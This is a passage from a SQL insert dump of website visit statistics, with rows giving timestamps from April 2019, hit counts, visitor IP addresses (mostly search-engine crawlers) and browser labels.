,'chrome'),(410921,1554692997,1,1,0,0,'40.77.167.46','other'),(410922,1554693228,1,1,0,0,'5.45.207.79','other'),(410923,1554693246,1,1,0,0,'178.154.244.11','other'),(410924,1554693855,1,1,0,0,'207.46.13.34','other'),(410925,1554694202,1,1,0,0,'66.249.66.220','chrome'),(410926,1554694313,2,2,0,0,'34.221.103.108','chrome'),(410927,1554694744,1,1,0,0,'60.191.38.77','firefox'),(410928,1554696244,1,1,0,0,'60.191.38.77','firefox'),(410929,1554696432,1,1,0,0,'66.249.66.218','chrome'),(410930,1554697447,1,0,1,0,'66.249.66.220',''),(410931,1554697605,1,1,0,0,'66.249.66.222','chrome'),(410932,1554697727,1,1,0,0,'157.55.39.72','other'),(410933,1554698599,1,1,0,0,'95.163.255.181','other'),(410934,1554698948,1,1,0,0,'66.249.66.220','chrome'),(410935,1554699331,2,2,0,0,'8.29.198.26','other'),(410936,1554699682,1,1,0,0,'37.9.113.148','other'),(410937,1554699687,1,1,0,0,'178.154.244.11','other'),(410938,1554701184,1,1,0,0,'207.46.13.71','other'),(410939,1554701576,1,1,0,0,'87.118.110.27','other'),(410940,1554701977,1,1,0,0,'66.249.66.130','chrome'),(410941,1554702372,2,2,0,0,'95.163.255.95','other'),(410942,1554702683,1,1,0,0,'95.163.255.93','other'),(410943,1554703088,1,1,0,0,'66.249.66.218','chrome'),(410944,1554704218,1,1,0,0,'95.163.255.92','other'),(410945,1554704451,1,1,0,0,'66.249.66.83','chrome'),(410946,1554704789,1,1,0,0,'180.76.15.137','other'),(410947,1554705449,1,1,0,0,'157.55.39.124','other'),(410948,1554705620,1,1,0,0,'91.196.178.73','firefox'),(410949,1554705659,2,2,0,0,'91.196.178.66','chrome'),(410950,1554705846,1,1,0,0,'180.163.220.5','other'),(410951,1554705871,1,1,0,0,'180.163.220.66','other'),(410952,1554706192,1,1,0,0,'42.236.10.84','other'),(410953,1554706203,1,1,0,0,'180.163.220.68','other'),(410954,1554706258,1,1,0,0,'42.236.10.92','other'),(410955,1554706426,1,1,0,0,'193.106.30.98','firefox'),(410956,1554706497,1,1,0,0,'207.46.13.32','other'),(410957,1554707170,1,1,0,0,'157.55.39.124','other'),(410958,1554707483,1,1,0,0,'212.111.196.54','chrome'),(410959,1554708133,1,1,0,0,'141.8.142.103','other'),(410960,1554708216,1,1,0,0,'87.250.224.47','other'),(410961,1554708235,2,2,0,0,'5.45.207.79','other'),(410962,1554708238,1,1,0,0,'213.180.203.9','other'),(410963,1554708551,1,1,0,0,'95.163.255.96','other'),(410964,1554708790,1,1,0,0,'157.55.39.10','other'),(410965,1554708926,2,2,0,0,'207.46.13.203','other'),(410966,1554708975,1,1,0,0,'95.163.255.92','other'),(410967,1554709139,1,1,0,0,'91.196.178.66','chrome'),(410968,1554709639,3,3,0,0,'77.222.134.102','other'),(410969,1554709762,1,1,0,0,'95.163.255.155','other'),(410970,1554710105,1,1,0,0,'66.249.66.218','chrome'),(410971,1554710107,1,1,0,0,'5.45.207.19','other'),(410972,1554710177,1,1,0,0,'8.29.198.25','other'),(410973,1554710363,1,1,0,0,'95.163.255.98','other'),(410974,1554710451,1,1,0,0,'212.111.196.54','chrome'),(410975,1554710863,1,1,0,0,'8.29.198.27','other'),(410976,1554711512,1,1,0,0,'66.249.66.218','chrome'),(410977,1554711562,1,1,0,0,'157.55.39.186','other'),(410978,1554711687,1,1,0,0,'37.73.167.17','chrome'),(410979,1554712050,1,1,0,0,'66.249.66.220','chrome'),(410980,1554712777,1,1,0,0,'95.163.255.167','other'),(410981,1554713202,1,1,0,0,'66.249.66.81','chrome'),(410982,1554713234,3,3,0,0,'66.249.66.222','chrome'),(410983,1554713519,2,2,0,0,'66.249.66.220','chrome'),(410984,1554713720,1,1,0,0,'13.57.233.99','chrome'),(410985,1554713814,1,1,0,0,'66.249.66.128','chrome'),(410986,1554714595,1,1,0,0,'95.163.255.92','other'),(410987,1554714689,1,1,0,0,'95.163.255.96','other'),(410988,1554715005,1,1,0,0,'157.55.39.186','other'),(410989,1554715580,1,1,0,0,'66.249.66.82','chrome'),(410990,1554715689,1,1,0,0,'37.53.89.92','chrome'),(410991,1554715820,1,1,0,0,'80.93.116.214','chrome'),(410992,1554716092,1,1,0,0,'207.46.13.203','other'),(410993,1554716108,1,1,0,0,'66.249.66.220','chrome'),(410994,1554716404,1,1,0,0,'66.249.66.128','chrome'),(410995,1554717441,3,3,0,0,'157.55.39.87','other'),(410996,1554717538,1,1,0,0,'91.124.182.170','firefox'),(410997,1554717657,1,1,0,0,'195.177.74.229','chrome'),(410998,1554718075,1,1,0,0,'5.45.207.79','other'),(410999,1554718086,1,1,0,0,'141.8.142.103','other'),(411000,1554718389,1,1,0,0,'141.8.142.108','other'),(411001,1554718469,1,1,0,0,'178.154.244.11','other'),(411002,1554718680,1,1,0,0,'157.55.39.87','other'),(411003,1554718719,1,1,0,0,'66.249.64.31','chrome'),(411004,1554719447,1,1,0,0,'34.220.42.120','other'),(411005,1554719986,1,1,0,0,'5.45.207.79','other'),(411006,1554720226,1,1,0,0,'157.55.39.199','other'),(411007,1554720464,2,2,0,0,'95.163.255.93','other'),(411008,1554720615,3,3,0,0,'66.249.64.29','chrome'),(411009,1554720637,1,1,0,0,'95.163.255.96','other'),(411010,1554721005,2,2,0,0,'8.29.198.27','other'),(411011,1554721317,1,1,0,0,'66.249.64.30','chrome'),(411012,1554721328,1,1,0,0,'178.154.244.11','other'),(411013,1554721584,2,2,0,0,'40.77.167.141','other'),(411014,1554722238,2,2,0,0,'66.249.64.30','chrome'),(411015,1554722273,1,1,0,0,'66.249.64.29','chrome'),(411016,1554722570,3,3,0,0,'91.124.182.170','firefox'),(411017,1554722684,1,1,0,0,'66.249.64.60','chrome'),(411018,1554722952,1,1,0,0,'66.249.64.31','chrome'),(411019,1554723865,1,1,0,0,'124.35.147.157','other'),(411020,1554724130,1,1,0,0,'91.196.178.66','chrome'),(411021,1554724559,1,1,0,0,'178.95.195.7','chrome'),(411022,1554724933,3,3,0,0,'66.249.64.31','chrome'),(411023,1554725090,1,1,0,0,'91.124.182.170','firefox'),(411024,1554725142,2,2,0,0,'66.249.64.30','chrome'),(411025,1554725201,1,1,0,0,'91.196.178.66','chrome'),(411026,1554725638,2,2,0,0,'40.77.167.141','other'),(411027,1554725647,1,1,0,0,'66.249.64.60','chrome'),(411028,1554725944,1,1,0,0,'91.226.56.226','chrome'),(411029,1554726261,1,1,0,0,'66.249.64.30','chrome'),(411030,1554726313,2,2,0,0,'157.55.39.100','other'),(411031,1554726481,1,1,0,0,'95.163.255.96','other'),(411033,1554726557,1,1,0,0,'178.133.90.226','chrome'),(411034,1554726581,1,1,0,0,'95.163.255.98','other'),(411035,1554726626,1,1,0,0,'66.249.64.58','chrome'),(411036,1554726674,1,1,0,0,'95.108.213.4','other'),(411037,1554727017,1,1,0,0,'66.249.64.60','chrome'),(411038,1554727496,2,2,0,0,'66.249.64.30','chrome'),(411039,1554727553,1,1,0,0,'157.55.39.168','other'),(411040,1554727964,1,1,0,0,'95.163.255.92','other'),(411041,1554727970,1,1,0,0,'95.163.255.99','other'),(411042,1554728073,1,1,0,0,'46.166.137.194','other'),(411043,1554728315,1,1,0,0,'66.249.64.29','chrome'),(411044,1554728598,3,3,0,0,'66.249.64.30','chrome'),(411045,1554728637,1,1,0,0,'87.250.224.81','other'),(411046,1554728678,2,2,0,0,'66.249.64.31','chrome'),(411047,1554728680,1,1,0,0,'93.73.173.105','chrome'),(411048,1554728726,1,1,0,0,'207.46.13.92','other'),(411049,1554728847,1,1,0,0,'141.8.142.108','other'),(411050,1554728914,1,1,0,0,'213.180.203.9','other'),(411051,1554729032,1,1,0,0,'157.55.39.168','other'),(411052,1554729145,1,1,0,0,'37.9.113.148','other'),(411053,1554729285,1,1,0,0,'5.45.207.79','other'),(411054,1554729288,1,1,0,0,'213.180.203.23','other'),(411055,1554729317,1,1,0,0,'178.154.171.24','other'),(411056,1554729967,1,1,0,0,'66.249.64.29','chrome'),(411057,1554730280,1,1,0,0,'178.154.244.11','other'),(411058,1554730618,1,1,0,0,'207.46.13.92','other'),(411059,1554730728,1,1,0,0,'95.108.213.4','other'),(411060,1554730738,1,1,0,0,'157.55.39.168','other'),(411061,1554730829,4,4,0,0,'66.249.64.30','chrome'),(411062,1554731143,1,1,0,0,'5.45.207.79','other'),(411063,1554731447,1,1,0,0,'37.9.113.148','other'),(411064,1554731864,1,1,0,0,'8.29.198.25','other'),(411065,1554731889,1,1,0,0,'66.249.64.30','chrome'),(411066,1554731910,1,1,0,0,'66.249.64.29','chrome'),(411067,1554731944,1,1,0,0,'207.46.13.73','other'),(411068,1554732548,1,1,0,0,'8.29.198.27','other'),(411069,1554732805,1,1,0,0,'157.55.39.100','other'),(411070,1554732906,1,1,0,0,'157.55.39.126','other'),(411071,1554733093,2,2,0,0,'66.249.64.29','chrome'),(411072,1554733561,3,3,0,0,'66.249.64.62','chrome'),(411073,1554733714,1,1,0,0,'95.163.255.93','other'),(411074,1554733746,3,3,0,0,'66.249.64.30','chrome'),(411075,1554733889,1,1,0,0,'93.73.173.105','chrome'),(411076,1554734079,1,1,0,0,'66.249.64.31','chrome'),(411077,1554734794,1,1,0,0,'93.73.173.105','chrome'),(411078,1554734976,1,1,0,0,'207.46.13.73','other'),(411079,1554735742,1,1,0,0,'66.249.64.62','chrome'),(411080,1554735995,1,1,0,0,'95.163.255.96','other'),(411081,1554736000,1,1,0,0,'95.163.255.94','other'),(411082,1554736296,1,1,0,0,'66.249.64.60','chrome'),(411083,1554737386,2,2,0,0,'66.249.64.29','chrome'),(411084,1554737419,1,1,0,0,'66.249.64.30','chrome'),(411085,1554737761,1,1,0,0,'5.45.207.19','other'),(411086,1554737898,2,2,0,0,'95.213.141.126','opera'),(411087,1554738229,1,1,0,0,'95.163.255.97','other'),(411088,1554738506,1,1,0,0,'95.163.255.96','other'),(411089,1554738611,2,2,0,0,'5.45.207.79','other'),(411090,1554739153,1,1,0,0,'66.249.64.31','chrome'),(411091,1554739439,1,1,0,0,'95.163.255.94','other'),(411092,1554739694,1,1,0,0,'95.163.255.92','other'),(411093,1554739954,1,1,0,0,'66.249.64.29','chrome'),(411094,1554740035,2,2,0,0,'66.249.64.30','chrome'),(411095,1554740205,1,1,0,0,'157.55.39.126','other'),(411096,1554740824,1,1,0,0,'66.249.64.31','chrome'),(411097,1554741046,1,1,0,0,'66.249.64.30','chrome'),(411098,1554742055,1,1,0,0,'40.77.167.162','other'),(411099,1554742094,1,1,0,0,'216.145.14.142','firefox'),(411100,1554742270,1,1,0,0,'91.196.178.77','firefox'),(411101,1554742422,1,1,0,0,'157.55.39.126','other'),(411102,1554742706,1,1,0,0,'8.29.198.26','other'),(411103,1554743384,1,1,0,0,'8.29.198.27','other'),(411104,1554743689,1,1,0,0,'66.249.64.30','chrome'),(411105,1554744028,1,1,0,0,'95.163.255.96','other'),(411106,1554744490,1,1,0,0,'66.249.64.58','chrome'),(411107,1554744752,1,1,0,0,'66.249.64.29','chrome'),(411108,1554744836,1,1,0,0,'157.55.39.126','other'),(411109,1554745411,2,2,0,0,'66.249.64.30','chrome'),(411110,1554745507,1,1,0,0,'46.211.110.83','chrome'),(411111,1554746409,2,2,0,0,'66.249.64.31','chrome'),(411112,1554746425,1,1,0,0,'5.45.207.79','other'),(411113,1554746527,1,1,0,0,'66.249.64.62','chrome'),(411114,1554746711,1,1,0,0,'178.154.244.11','other'),(411115,1554746895,1,1,0,0,'66.249.64.60','chrome'),(411116,1554746978,1,1,0,0,'95.108.213.4','other'),(411117,1554747494,1,1,0,0,'54.149.240.228','chrome'),(411118,1554747769,1,1,0,0,'95.163.255.184','other'),(411119,1554748231,2,2,0,0,'207.46.13.100','other'),(411120,1554748289,1,1,0,0,'180.76.15.19','other'),(411121,1554748972,1,1,0,0,'66.249.64.58','chrome'),(411122,1554749608,1,1,0,0,'95.163.255.94','other'),(411123,1554749610,1,1,0,0,'95.163.255.93','other'),(411124,1554750203,1,0,1,0,'66.249.64.29',''),(411125,1554750744,2,2,0,0,'40.77.167.93','other'),(411126,1554751647,1,1,0,0,'157.55.39.219','other'),(411127,1554752795,1,1,0,0,'66.249.64.31','chrome'),(411128,1554752882,3,3,0,0,'66.249.64.29','chrome'),(411129,1554752977,1,1,0,0,'66.249.64.30','chrome'),(411130,1554753139,1,1,0,0,'5.45.207.79','other'),(411131,1554753148,2,2,0,0,'178.154.244.11','other'),(411132,1554753198,1,1,0,0,'95.163.255.96','other'),(411133,1554753357,1,1,0,0,'95.108.213.4','other'),(411134,1554753545,2,2,0,0,'8.29.198.25','other'),(411135,1554754216,2,2,0,0,'5.45.207.19','other'),(411136,1554754524,1,1,0,0,'5.45.207.79','other'),(411137,1554755102,1,1,0,0,'40.77.167.3','other'),(411138,1554755339,2,2,0,0,'157.55.39.101','other'),(411139,1554755510,1,1,0,0,'91.196.178.186','chrome'),(411140,1554756400,2,2,0,0,'157.55.39.64','other'),(411141,1554756534,1,1,0,0,'157.55.39.101','other'),(411142,1554756723,1,1,0,0,'66.249.64.29','chrome'),(411143,1554756830,2,2,0,0,'66.249.64.31','chrome'),(411144,1554757072,1,1,0,0,'66.249.64.30','chrome'),(411145,1554757155,1,1,0,0,'95.163.255.99','other'),(411146,1554757234,1,1,0,0,'95.163.255.93','other'),(411147,1554757273,1,1,0,0,'178.121.251.223','chrome'),(411148,1554757460,1,1,0,0,'157.55.39.101','other'),(411149,1554758261,1,1,0,0,'52.53.201.78','chrome'),(411150,1554758746,1,1,0,0,'207.46.13.77','other'),(411151,1554758774,1,1,0,0,'95.163.255.192','other'),(411152,1554758897,1,1,0,0,'141.8.132.16','other'),(411153,1554758905,1,1,0,0,'157.55.39.2','other'),(411154,1554759042,1,1,0,0,'13.66.139.0','other'),(411155,1554759119,1,1,0,0,'66.249.64.30','chrome'),(411156,1554759130,1,1,0,0,'95.108.213.4','other'),(411157,1554759197,1,1,0,0,'91.209.11.236','other'),(411158,1554759224,1,1,0,0,'87.250.224.81','other'),(411159,1554759355,1,1,0,0,'178.154.244.11','other'),(411160,1554759413,1,1,0,0,'87.250.224.64','other'),(411161,1554760236,1,1,0,0,'95.163.255.153','other'),(411162,1554760917,1,1,0,0,'66.249.64.31','chrome'),(411163,1554761501,1,1,0,0,'95.163.255.93','other'),(411164,1554762479,1,0,1,0,'51.68.152.26',''),(411165,1554762706,5,5,0,0,'66.249.64.29','chrome'),(411166,1554762718,2,2,0,0,'66.249.64.30','chrome'),(411167,1554763044,2,2,0,0,'66.249.64.31','chrome'),(411168,1554763088,1,1,0,0,'157.55.39.179','other'),(411169,1554763325,1,1,0,0,'95.163.255.94','other'),(411170,1554763454,1,1,0,0,'66.249.64.60','chrome'),(411171,1554763961,2,2,0,0,'66.249.64.31','chrome'),(411172,1554764110,4,4,0,0,'66.249.64.29','chrome'),(411173,1554764387,1,1,0,0,'8.29.198.25','other'),(411174,1554764430,1,1,0,0,'95.108.213.4','other'),(411175,1554764468,1,1,0,0,'66.249.64.30','chrome'),(411176,1554764469,1,1,0,0,'87.250.224.65','other'),(411177,1554764615,1,1,0,0,'95.163.255.188','other'),(411178,1554764814,1,1,0,0,'37.9.113.20','other'),(411179,1554764913,1,1,0,0,'5.45.207.79','other'),(411180,1554765059,1,1,0,0,'8.29.198.27','other'),(411181,1554765256,1,1,0,0,'66.249.64.29','chrome'),(411182,1554766358,1,1,0,0,'157.55.39.126','other'),(411183,1554766436,2,2,0,0,'66.249.64.31','chrome'),(411184,1554766978,1,1,0,0,'66.249.64.29','chrome'),(411185,1554766981,1,1,0,0,'66.249.64.30','chrome'),(411186,1554767663,1,1,0,0,'95.163.255.98','other'),(411187,1554767678,1,1,0,0,'95.163.255.96','other'),(411188,1554767741,1,1,0,0,'42.236.10.117','other'),(411189,1554767756,1,1,0,0,'180.163.220.68','other'),(411190,1554767772,1,1,0,0,'42.236.10.106','other'),(411191,1554767781,1,1,0,0,'42.236.10.75','other'),(411192,1554768074,1,1,0,0,'66.249.64.31','chrome'),(411193,1554768108,1,1,0,0,'66.249.64.29','chrome'),(411194,1554768516,1,1,0,0,'157.55.39.79','other'),(411195,1554769165,1,1,0,0,'95.163.255.94','other'),(411196,1554769320,1,1,0,0,'13.66.139.0','other'),(411197,1554769460,2,2,0,0,'66.249.64.29','chrome'),(411198,1554769575,1,1,0,0,'66.249.64.30','chrome'),(411199,1554770240,1,1,0,0,'66.249.64.62','chrome'),(411200,1554770438,1,1,0,0,'66.249.64.31','chrome'),(411201,1554770663,2,2,0,0,'66.249.64.30','chrome'),(411202,1554771025,1,1,0,0,'95.163.255.95','other'),(411203,1554771032,1,1,0,0,'141.8.142.103','other'),(411204,1554771103,2,2,0,0,'5.45.207.79','other'),(411205,1554771160,1,1,0,0,'66.249.64.29','chrome'),(411206,1554771181,1,1,0,0,'95.163.255.161','other'),(411207,1554771617,1,1,0,0,'34.220.39.201','other'),(411208,1554771829,1,1,0,0,'40.77.167.12','other'),(411209,1554772049,1,1,0,0,'46.242.32.245','msie'),(411210,1554772245,1,1,0,0,'66.249.64.30','chrome'),(411211,1554772316,2,2,0,0,'207.46.13.77','other'),(411212,1554772566,1,1,0,0,'5.45.207.79','other'),(411213,1554773305,2,2,0,0,'95.163.255.98','other'),(411214,1554773412,1,1,0,0,'40.77.167.12','other'),(411215,1554773682,1,1,0,0,'66.249.64.31','chrome'),(411216,1554773699,1,1,0,0,'66.249.64.29','chrome'),(411217,1554774501,1,1,0,0,'66.249.64.62','chrome'),(411218,1554774784,1,1,0,0,'66.249.64.58','chrome'),(411219,1554775004,1,1,0,0,'95.163.255.97','other'),(411220,1554775085,1,1,0,0,'95.163.255.96','other'),(411221,1554775226,1,1,0,0,'8.29.198.26','other'),(411222,1554775892,1,1,0,0,'8.29.198.25','other'),(411223,1554776041,1,1,0,0,'40.77.167.12','other'),(411224,1554777073,1,1,0,0,'207.46.13.180','other'),(411225,1554777179,1,1,0,0,'66.249.64.30','chrome'),(411226,1554777288,1,1,0,0,'66.249.64.60','chrome'),(411227,1554777923,2,2,0,0,'34.222.247.231','chrome'),(411228,1554777948,1,1,0,0,'178.154.244.11','other'),(411229,1554778049,172,172,0,0,'173.208.130.202','other'),(411230,1554778573,98,98,0,0,'173.212.241.58','other'),(411231,1554778625,1,1,0,0,'109.74.154.72','chrome'),(411232,1554778798,1,1,0,0,'66.249.64.29','chrome'),(411233,1554778953,39,39,0,0,'173.208.130.202','other'),(411234,1554778993,67,67,0,0,'79.143.185.25','other'),(411235,1554779415,2,2,0,0,'40.77.167.12','other'),(411236,1554779441,1,1,0,0,'95.163.255.98','other'),(411237,1554779453,1,1,0,0,'95.163.255.97','other'),(411238,1554779738,19,19,0,0,'173.208.200.154','other'),(411239,1554779905,61,61,0,0,'79.143.185.25','other'),(411240,1554780559,2,2,0,0,'66.249.64.31','chrome'),(411241,1554780806,8,8,0,0,'79.143.185.25','other'),(411242,1554780886,1,1,0,0,'95.163.255.93','other'),(411243,1554780963,1,1,0,0,'52.162.161.148','other'),(411244,1554781055,40,40,0,0,'5.9.98.234','other'),(411245,1554783070,1,1,0,0,'207.46.13.133','other'),(411246,1554783186,1,1,0,0,'5.228.124.77','chrome'),(411247,1554783389,1,1,0,0,'40.77.167.198','other'),(411248,1554783471,1,1,0,0,'157.55.39.101','other'),(411249,1554783943,2,2,0,0,'66.249.64.30','chrome'),(411250,1554784007,1,1,0,0,'13.66.139.0','other'),(411251,1554784424,1,1,0,0,'95.108.213.4','other'),(411252,1554784523,1,1,0,0,'5.45.207.19','other'),(411253,1554784630,1,1,0,0,'157.55.39.101','other'),(411254,1554785166,1,1,0,0,'5.45.207.79','other'),(411255,1554785194,1,1,0,0,'178.154.244.11','other'),(411256,1554785255,1,1,0,0,'66.249.64.60','chrome'),(411257,1554785278,1,1,0,0,'92.220.0.232','other'),(411258,1554785510,1,1,0,0,'95.163.255.98','other'),(411259,1554785641,1,1,0,0,'13.66.139.0','other'),(411260,1554786066,1,1,0,0,'8.29.198.27','other'),(411261,1554786255,1,1,0,0,'66.249.64.31','chrome'),(411262,1554786581,1,1,0,0,'5.45.207.19','other'),(411263,1554786725,1,1,0,0,'8.29.198.25','other'),(411264,1554787475,1,1,0,0,'66.249.64.58','chrome'),(411265,1554787544,1,1,0,0,'157.55.39.108','other'),(411266,1554787557,1,1,0,0,'91.196.178.130','firefox'),(411267,1554787571,1,1,0,0,'42.236.10.78','other'),(411268,1554787673,1,1,0,0,'109.69.90.86','chrome'),(411269,1554787687,24,24,0,0,'37.17.172.132','firefox'),(411270,1554787838,2,2,0,0,'66.249.64.29','chrome'),(411271,1554787898,1,1,0,0,'66.249.64.30','chrome'),(411272,1554788123,1,1,0,0,'141.8.142.103','other'),(411273,1554788615,8,8,0,0,'37.17.172.132','firefox'),(411274,1554788974,1,1,0,0,'40.77.167.85','other'),(411275,1554789052,1,1,0,0,'87.250.224.47','other'),(411276,1554789395,1,1,0,0,'180.76.15.154','other'),(411277,1554789400,3,3,0,0,'66.249.64.30','chrome'),(411278,1554789511,2,2,0,0,'66.249.64.29','chrome'),(411279,1554789658,1,1,0,0,'157.55.39.73','other'),(411280,1554789872,1,1,0,0,'157.55.39.99','other'),(411281,1554790267,1,1,0,0,'157.55.39.108','other'),(411282,1554790874,1,1,0,0,'209.17.97.66','other'),(411283,1554791011,1,1,0,0,'13.66.139.0','other'),(411284,1554791022,1,1,0,0,'66.249.64.31','chrome'),(411285,1554791249,3,3,0,0,'66.249.64.29','chrome'),(411286,1554791397,1,1,0,0,'180.76.15.11','other'),(411287,1554791872,5,5,0,0,'178.154.244.11','other'),(411288,1554791888,1,1,0,0,'212.103.50.217','chrome'),(411289,1554791981,1,1,0,0,'66.249.64.58','chrome'),(411290,1554792002,2,2,0,0,'66.249.64.30','chrome'),(411291,1554792235,1,1,0,0,'66.249.64.29','chrome'),(411292,1554792603,1,1,0,0,'5.45.207.19','other'),(411293,1554792663,1,1,0,0,'5.45.207.79','other'),(411294,1554792732,1,1,0,0,'95.163.255.93','other'),(411295,1554792779,1,1,0,0,'178.154.244.11','other'),(411296,1554792895,1,1,0,0,'95.163.255.97','other'),(411297,1554792965,2,2,0,0,'66.249.64.30','chrome'),(411298,1554793035,1,1,0,0,'66.249.64.58','chrome'),(411299,1554793181,1,1,0,0,'66.249.64.31','chrome'),(411300,1554793231,1,1,0,0,'180.76.15.30','other'),(411301,1554794302,2,2,0,0,'66.249.64.58','chrome'),(411302,1554794510,2,2,0,0,'66.249.64.30','chrome'),(411303,1554794798,2,2,0,0,'66.249.64.29','chrome'),(411304,1554795214,1,1,0,0,'95.163.255.95','other'),(411305,1554795267,1,1,0,0,'66.249.64.31','chrome'),(411306,1554795663,1,1,0,0,'91.196.178.77','chrome'),(411307,1554795773,3,2,1,0,'66.249.64.30',''),(411308,1554795832,2,2,0,0,'66.249.64.29','chrome'),(411309,1554796586,1,1,0,0,'66.249.64.31','chrome'),(411310,1554796599,1,1,0,0,'157.55.39.73','other'),(411311,1554796824,2,2,0,0,'66.249.64.58','chrome'),(411312,1554796908,1,1,0,0,'157.55.39.108','other'),(411313,1554796940,1,1,0,0,'8.29.198.26','other'),(411314,1554797133,1,1,0,0,'91.196.178.66','chrome'),(411315,1554797192,2,2,0,0,'91.196.177.15','chrome'),(411316,1554797196,2,2,0,0,'95.163.255.93','other'),(411317,1554797355,2,2,0,0,'207.46.13.145','other'),(411318,1554797369,3,3,0,0,'66.249.64.29','chrome'),(411319,1554797547,1,1,0,0,'95.163.255.97','other'),(411320,1554797559,1,1,0,0,'95.163.255.94','other'),(411321,1554797746,1,1,0,0,'8.29.198.25','other'),(411322,1554798134,4,4,0,0,'66.249.64.30','chrome'),(411323,1554798172,1,1,0,0,'46.174.242.153','firefox'),(411324,1554798694,2,2,0,0,'66.249.64.31','chrome'),(411325,1554798716,1,1,0,0,'91.209.11.236','other'),(411326,1554798888,3,3,0,0,'66.249.64.29','chrome'),(411327,1554798994,1,1,0,0,'95.163.255.92','other'),(411328,1554799020,1,1,0,0,'178.154.244.11','other'),(411329,1554799163,1,1,0,0,'66.249.64.30','chrome'),(411330,1554799313,52,52,0,0,'148.251.195.14','other'),(411331,1554799349,1,1,0,0,'37.9.113.148','other'),(411332,1554799464,1,1,0,0,'5.45.207.79','other'),(411333,1554799504,1,1,0,0,'87.250.224.65','other'),(411334,1554799660,1,1,0,0,'46.219.6.40','chrome'),(411335,1554799698,2,2,0,0,'5.45.207.19','other'),(411336,1554799876,1,1,0,0,'141.8.142.103','other'),(411337,1554799930,5,5,0,0,'66.249.64.31','chrome'),(411338,1554800080,1,1,0,0,'40.77.167.85','other'),(411339,1554800491,1,1,0,0,'91.124.182.170','firefox'),(411340,1554800504,3,3,0,0,'66.249.64.29','chrome'),(411341,1554801001,2,2,0,0,'66.249.64.60','chrome'),(411342,1554801103,1,1,0,0,'91.124.58.79','chrome'),(411343,1554801124,1,1,0,0,'40.77.167.85','other'),(411344,1554801128,1,1,0,0,'66.249.64.31','chrome'),(411345,1554801256,1,1,0,0,'66.249.64.30','chrome'),(411346,1554801346,2,2,0,0,'207.46.13.145','other'),(411347,1554801397,1,1,0,0,'66.249.64.62','chrome'),(411348,1554801765,33,33,0,0,'148.251.195.14','other'),(411349,1554802020,1,1,0,0,'66.249.64.58','chrome'),(411350,1554802424,1,1,0,0,'66.249.64.30','chrome'),(411351,1554802537,1,1,0,0,'207.46.13.145','other'),(411352,1554802563,1,1,0,0,'66.249.64.31','chrome'),(411353,1554802694,2,2,0,0,'66.249.64.29','chrome'),(411354,1554802806,32,32,0,0,'144.76.38.10','other'),(411355,1554803403,1,1,0,0,'95.163.255.94','other'),(411356,1554803514,1,1,0,0,'193.106.30.98','firefox'),(411357,1554803527,1,1,0,0,'83.218.235.148','chrome'),(411358,1554803691,1,1,0,0,'157.55.39.108','other'),(411359,1554803860,1,1,0,0,'66.249.64.30','chrome'),(411360,1554803953,1,1,0,0,'66.249.64.62','chrome'),(411361,1554804408,1,1,0,0,'40.77.167.85','other'),(411362,1554804459,2,2,0,0,'66.249.64.58','chrome'),(411363,1554804572,1,1,0,0,'80.95.45.101','chrome'),(411364,1554804892,2,2,0,0,'66.249.64.30','chrome'),(411365,1554805036,2,2,0,0,'157.55.39.108','other'),(411366,1554805079,1,1,0,0,'95.163.255.93','other'),(411367,1554805276,1,1,0,0,'87.250.224.47','other'),(411368,1554805579,1,1,0,0,'176.9.9.94','other'),(411369,1554806223,1,1,0,0,'66.249.64.58','chrome'),(411370,1554806226,1,1,0,0,'66.249.64.31','chrome'),(411371,1554806390,1,1,0,0,'66.249.64.29','chrome'),(411372,1554806429,5,5,0,0,'66.249.64.30','chrome'),(411373,1554806641,1,1,0,0,'193.150.6.153','chrome'),(411374,1554806952,1,1,0,0,'66.249.64.62','chrome'),(411375,1554807087,1,1,0,0,'95.163.255.92','other'),(411376,1554807090,1,1,0,0,'95.163.255.94','other'),(411377,1554807206,1,1,0,0,'66.249.64.58','chrome'),(411378,1554807382,2,2,0,0,'207.46.13.32','other'),(411379,1554807782,1,1,0,0,'8.29.198.27','other'),(411380,1554807982,5,5,0,0,'66.249.64.30','chrome'),(411381,1554808142,1,1,0,0,'66.249.64.58','chrome'),(411382,1554808249,1,1,0,0,'40.77.167.210','other'),(411383,1554808384,1,1,0,0,'180.76.15.163','other'),(411384,1554808392,1,1,0,0,'157.55.39.80','other'),(411385,1554808418,1,1,0,0,'66.249.64.60','chrome'),(411386,1554808450,1,1,0,0,'91.196.178.35','chrome'),(411387,1554808530,2,2,0,0,'207.46.13.145','other'),(411388,1554808631,1,1,0,0,'8.29.198.26','other'),(411389,1554809324,2,2,0,0,'66.249.64.58','chrome'),(411390,1554809504,1,1,0,0,'207.46.13.32','other'),(411391,1554809586,1,1,0,0,'66.249.64.30','chrome'),(411392,1554809741,2,2,0,0,'66.249.64.29','chrome'),(411393,1554809977,1,1,0,0,'66.249.64.31','chrome'),(411394,1554810607,1,1,0,0,'95.163.255.99','other'),(411395,1554810656,1,1,0,0,'66.249.64.60','chrome'),(411396,1554810880,1,1,0,0,'95.163.255.95','other'),(411397,1554810903,1,1,0,0,'178.154.244.11','other'),(411398,1554810968,1,1,0,0,'95.108.181.83','other'),(411399,1554811137,1,1,0,0,'141.8.132.16','other'),(411400,1554811172,1,1,0,0,'5.255.253.38','other'),(411401,1554811531,1,1,0,0,'37.53.228.155','chrome'),(411402,1554812371,2,2,0,0,'66.249.64.29','chrome'),(411403,1554812488,1,1,0,0,'109.207.193.98','chrome'),(411404,1554812819,2,2,0,0,'66.249.64.58','chrome'),(411405,1554813088,1,1,0,0,'37.204.4.249','chrome'),(411406,1554813091,2,2,0,0,'66.249.64.30','chrome'),(411407,1554813466,3,3,0,0,'66.249.64.29','chrome'),(411408,1554813700,1,1,0,0,'66.249.64.31','chrome'),(411409,1554814005,1,1,0,0,'91.196.178.66','chrome'),(411410,1554814196,1,1,0,0,'40.77.167.210','other'),(411411,1554814506,1,1,0,0,'66.249.64.58','chrome'),(411412,1554814752,1,1,0,0,'95.163.255.172','other'),(411413,1554814946,1,1,0,0,'95.163.255.98','other'),(411414,1554815255,1,1,0,0,'66.249.64.62','chrome'),(411415,1554815417,1,1,0,0,'66.249.64.60','chrome'),(411416,1554815713,1,1,0,0,'157.55.39.80','other'),(411417,1554815967,1,1,0,0,'180.76.15.142','other'),(411418,1554816154,4,4,0,0,'66.249.64.30','chrome'),(411419,1554816445,2,2,0,0,'66.249.64.29','chrome'),(411420,1554816738,1,1,0,0,'178.154.200.48','other'),(411421,1554816802,1,1,0,0,'5.45.207.79','other'),(411422,1554816900,1,1,0,0,'95.163.255.96','other'),(411423,1554816952,1,1,0,0,'66.249.64.31','chrome'),(